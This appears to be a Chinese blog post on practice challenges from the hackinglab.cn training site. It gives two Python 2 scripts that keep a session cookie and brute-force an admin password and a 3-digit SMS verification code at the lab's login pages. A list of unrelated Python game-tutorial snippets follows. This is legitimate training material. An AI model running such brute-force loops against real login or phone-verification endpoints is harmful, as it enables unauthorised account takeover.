PYTHON POST练手

  闲着无事跟着某同学在hackinglab.cn上做两道脚本题练手 就是模拟POST发包而已

  4-大致上是每次访问index.php相对应一个验证码,只要不重新访问这个页面,用同一个验证码即可。于是代码模拟访问这个页面,获取cookie,再暴力密码post

  11-思路相近,查看源码推测是post到vcode.php对应一个验证码,所以暴力之前post到这个php一次  

    PS:需要暴力两个电话号码

  

#!/bin/env python
import urllib, urllib2, cookielib

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen(‘http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php‘)
print response.read()

username="admin"
pwd=1
vcode=""
submit="submit"

vcode = raw_input()

data = {‘username‘: username,
        ‘pwd‘:  pwd,
        ‘vcode‘: vcode,
        ‘submit‘: submit,
        }

for i in range(10000, 1000, -1):
    data[‘pwd‘] = i
    f = urllib2.urlopen(
        url = ‘http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php‘,
        data = urllib.urlencode(data),
        )
    if ‘error‘ not in f.read():
        print ‘answer is %d‘ % i
        break
#!/bin/env python
import urllib, urllib2, cookielib

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen(‘http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/#‘)
print response.read()
response = urllib2.urlopen(
        url = ‘http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php‘,
        data = urllib.urlencode({‘getcode‘:1, ‘mobi‘:13399999999})
        )
print response.read()

username="13399999999"
vcode=""
submit="submit"

data = {‘username‘: username,
        ‘vcode‘: vcode,
        ‘Login‘: submit,
        }

for i in range(100, 1000):
    data[‘vcode‘] = i
    f = urllib2.urlopen(
        url = ‘http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php‘,
        data = urllib.urlencode(data),
        )
    print f.read()
    """
    if ‘error‘ not in f.read():
        print ‘answer is %d‘ % i
        break
    """
时间: 2024-12-20 01:19:46

PYTHON POST练手的相关文章

python游戏练手--乒乓球

啥也不说了,就是个练手,丑是丑了一点,但是还可以抢救一下的 # -*- coding: utf-8 -*-import pygame as pgfrom pygame.locals import * #将pygame所有常量导入,如后面的QUITfrom time import sleepimport sys pg.init() #初始化,如果没有的话字体会报错等等scr=pg.display.set_mode((600,550)) #设置屏幕大小pg.display.set_caption((

python游戏练手--贪吃蛇

啥也不说了,就是个小练习 #!/usr/bin/env python# coding=utf-8import pygameimport sysimport random # 全局定义,screen的长和宽SCREEN_X = 600SCREEN_Y = 600 # 蛇类# 点以25为单位class Snake(object): # 定义一个类--Snake,默认使用object类,如果你有更好的话,可以替换它 # 初始化各种需要的属性 [开始时默认向右/身体块x5] def __init__(s

python游戏练手--猜数字

#!/usr/bin/env python#coding=utf-8 import random #将玩家猜测过的数字保存到这个变量中,因为玩家还没有做过任何猜测,所以保存的是整数0guessesTaken = 0 print('Hello! What is your name?')MyName = input() #判断输入到MyName中的值是否存在#不存在的话,就告诉用户需要输入字符串,不能直接回车或者空格代替if MyName == "": print('Hello! What

day-1.python初学者练手题

1.编写一个名为right_justify的函数,函数接受一个名为``s``的字符串作为形参, 并在打印足够多的前导空格(leading space)之后打印这个字符串,使得字符串的最后一个字母位于显示屏的第70列. def right_justify(s): length = len(s) lspace = 70 - length so = ' ' * lspace + s print(so) right_justify('dean') 2.函数对象是一个可以赋值给变量的值,也可以作为实参传递

Python之路【第二十四篇】:Python学习路径及练手项目合集

Python学习路径及练手项目合集 Wayne Shi· 2 个月前 参照:https://zhuanlan.zhihu.com/p/23561159 更多文章欢迎关注专栏:学习编程. 本系列Python技术路径中包含入门知识.Python基础.Web框架.基础项目.网络编程.数据与计算.综合项目七个模块.路径中的教程将带你逐步深入,学会如何使用 Python 实现一个博客,桌面词典,微信机器人或网络安全软件等.完成本路径的基础及项目练习,将具备独立的Python开发能力. 完整的Python学

Python入门、练手、视频资源汇总,拿走别客气!

摘要:为方便朋友,重新整理汇总,内容包括长期必备.入门教程.练手项目.学习视频. 一.长期必备. 1. StackOverflow,是疑难解答.bug排除必备网站,任何编程问题请第一时间到此网站查找. https://stackoverflow.com/ 2. github,是源码学习.版本控制不可缺少的网站,找源码学习请第一时间到此网站,fork之后自己维护. https://github.com/ 3. Awesome Python 最全的python资源,没有之一,绝对不容错过的pytho

70个Python练手项目

前言: 不管学习那门语言都希望能做出实际的东西来,这个实际的东西当然就是项目啦,不用多说大家都知道学编程语言一定要做项目才行. 这里整理了70个Python实战项目列表,都有完整且详细的教程,你可以从中选择自己想做的项目进行参考学习练手,你也可以从中寻找灵感去做自己的项目. 70个Python项目列表: 1.[Python 图片转字符画]2.[200行Python代码实现2048]3.[Python3 实现火车票查询工具]4.[高德API+Python解决租房问题 ]5.[Python3 色情图

4个Python经典项目实战,练手必备哦!

Python是一种极具可读性和通用性的编程语言.Python这个名字的灵感来自于英国喜剧团体Monty Python,它的开发团队有一个重要的基础目标,就是使语言使用起来很有趣.Python易于设置,并且是用相对直接的风格来编写,对错误会提供即时反馈,对初学者而言是个很好的选择. Python是一种多范式语言,也就是说,它支持多种编程风格,包括脚本和面向对象,这使得它适用于通用目的.随着越来越多地在工业中,被诸如联合太空联盟(NASA的主要飞机支持承包商)和工业光魔(VFX 和卢卡斯影业的动画工

Python练手项目:20行爬取全王者全英雄皮肤

引言 ? ?王者荣耀大家都玩过吧,没玩过的也应该听说过,作为时下最火的手机MOBA游戏,咳咳,好像跑题了.我们今天的重点是爬取王者荣耀所有英雄的所有皮肤,而且仅仅使用20行Python代码即可完成. ? ?文中源代码在文章末尾,可自行复制粘贴. 准备工作 ? ?爬取皮肤本身并不难,难点在于分析,我们首先得得到皮肤图片的url地址,话不多说,我们马上来到王者荣耀的官网: ? ?我们点击英雄资料,然后随意地选择一位英雄,接着F12打开调试台,找到英雄原皮肤的图片地址: ? ?接着,我们切换一下英雄的